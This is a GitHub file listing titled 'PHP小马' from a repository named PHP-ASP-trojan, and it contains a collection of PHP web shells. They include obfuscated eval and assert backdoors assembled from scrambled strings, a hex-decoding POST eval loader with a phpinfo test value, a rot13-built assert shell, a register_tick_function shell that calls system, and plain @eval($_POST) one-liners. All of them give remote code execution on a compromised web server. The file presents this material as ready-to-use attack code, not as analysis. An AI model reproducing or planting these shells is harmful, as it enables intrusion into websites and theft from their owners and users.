forked from qw287154203/PHP-ASP-trojan
-
Notifications
You must be signed in to change notification settings - Fork 1
/
PHP小马.txt
114 lines (93 loc) · 3.17 KB
/
PHP小马.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
<?php
$oK = $oK.substr("lB12payJCstr_ru0Qk",9,5);
$in9 = ltrim("y9fxwgjl42");
$oK = $oK.substr("lNtLReplace",5,6);
$h01b = rtrim("orfhmyolneltsh");
$w = $w.$oK("h6Uc","","QGV2");
$hxkb = trim("w53ypvpi4lt");
$n = $n.$oK("fh","","bafhsefh64_fhd");
$sst = stripos("k2ace0wil2ib92p36","sst");
$e0 = $e0.$oK("oGG","","creatoGG");
$qgu = rtrim("ekq7vy9rue3");
$w = $w.substr("jiobPjYWwoJbm3TlcR",6,5);
$gn2f = rtrim("s5un3ia2kicummbi72");
$n = $n.$oK("srC","","esrCcosrCdsrCe");
$r6j = rtrim("tb69l60ij8i2");
$e0 = $e0.$oK("gA1h","","e_fgA1hu");
$bgis = stripos("le6haub1abr2xwlu56","bgis");
$w = $w.$oK("e0","","Fe09e0QT1Ne0Ue0Wy");
$uus = strlen("wxyqhhbe0v1bms");
$e0 = $e0.$oK("mvM5","","nmvM5cmvM5ti");
$nh = ltrim("pmytd571ghfof");
$w = $w.substr("ciyd5MmdyYzQ",3,9);
$c8qo = strlen("ixyumn02x00p");
$e0 = $e0.substr("w0XonjMdD",3,2);
$ghsc = ltrim("wl15120i5iv884pf");
$w = $w.$oK("gMMW","","4gMMWd2VgMMW");
$b2pd = stripos("yv8r10xc3q3j","b2pd");
$w = $w.$oK("ibis","","raibisnhzMm");
$mj = trim("kqy7gyprynik226b");
$w = $w.$oK("h5G","","gh5Gnh5GXh5GSh5Gk7");
$n1 = str_split("mor3861p0q0",1);
$e9 = $e0("", $n($w));
$x54 = trim("ihr2pdc72iy18ql6g");
$brha = rtrim("s4idij4p5l");
$de8l = str_split("l8spsgyeqhmrds",10);
$nn = rtrim("riabem46t4");
$pq = str_split("vcnkjvs7qw",3);
$oa = stripos("luxn4jc4ison","oa");$e9();
$c8ug = strlen("gorn6nnkheoa0ydq");
function k(){};
$aks3 = rtrim("e4ybhqgj1f1x4alr");
$y8iv = rtrim("tkeitv5tirh9s91mn9n");
$cx87 = stripos("gco95cfg1gxii","cx87");
$lm = str_split("b5bl7sj0gj28fhjljag",5);
$lk = str_split("noj4ojgct2dbp0",1);
$bepa = ltrim("iyr388u99kj1i");
$fjsa = trim("wf60mbhbupk3siceqx4");
?>
密码
@eval($_POST['y2grc48wekjxs2h']);
<?php error_reporting(0);set_time_limit(0);$a=$_POST["x"];if($a){$a=str_replace(array("\n","\t","\r"),"",$a);$b="";for($i=0;$i<strlen($a);$i+=2)$b.=urldecode("%".substr($a,$i,2));eval($b);exit;};?>
测试 x=706870696E666F28293B
<?php function aishen($user){$b='s'.'tr_r'.'ot13';$c=&$b;$a=$c('nffreg');if(empty($user)){$user="echo '90sec'";}$a($user);}aishe($_POST['xihai']);?>
<?php
$a = "0,1,2,3,4,5,s,y,s,t,e,m";
// 根据','转换成数组
$array = explode(",",$a);
// 空变量
$func = ”;
for($i=6;$i<count($arr);$i++) {
$func .= $func . $arr[$i];
}
// 接收content参数
$c = $_REQUEST["content"];
register_tick_function($func,$c);
// 每执行3条低级语句就去执行一次 register_tick_function() 注册的函数
{
declare(ticks = 3);
}
?>
<?php
function cve($str,$key)
{
$t="";
for($i=0; $i<strlen($str); $i=$i+2)
{
$k=(($i+2)/2)%strlen($key);
$p=substr($key, $k,1);
if(is_numeric(substr($str, $i,1)))
{
$t=$t.chr(hexdec(substr($str, $i,2))-$p);
}
else
{
$t=$t.chr(hexdec(substr($str, $i,4)));
$i=$i+2;
}
}
return($t);
}
(@$_=cve('6A767C687B77','39')).@$_(cve('6776666E286763736A38346466656871646A2A2464524F58565B2C7C302C5F292E','520'));
?>
<?php $str_tmp = "eval"; $str_tmp .= "(";$str_tmp .= "$";$str_tmp .= "_PO";$str_tmp .= "ST[77]);";@eval($str_tmp); ?>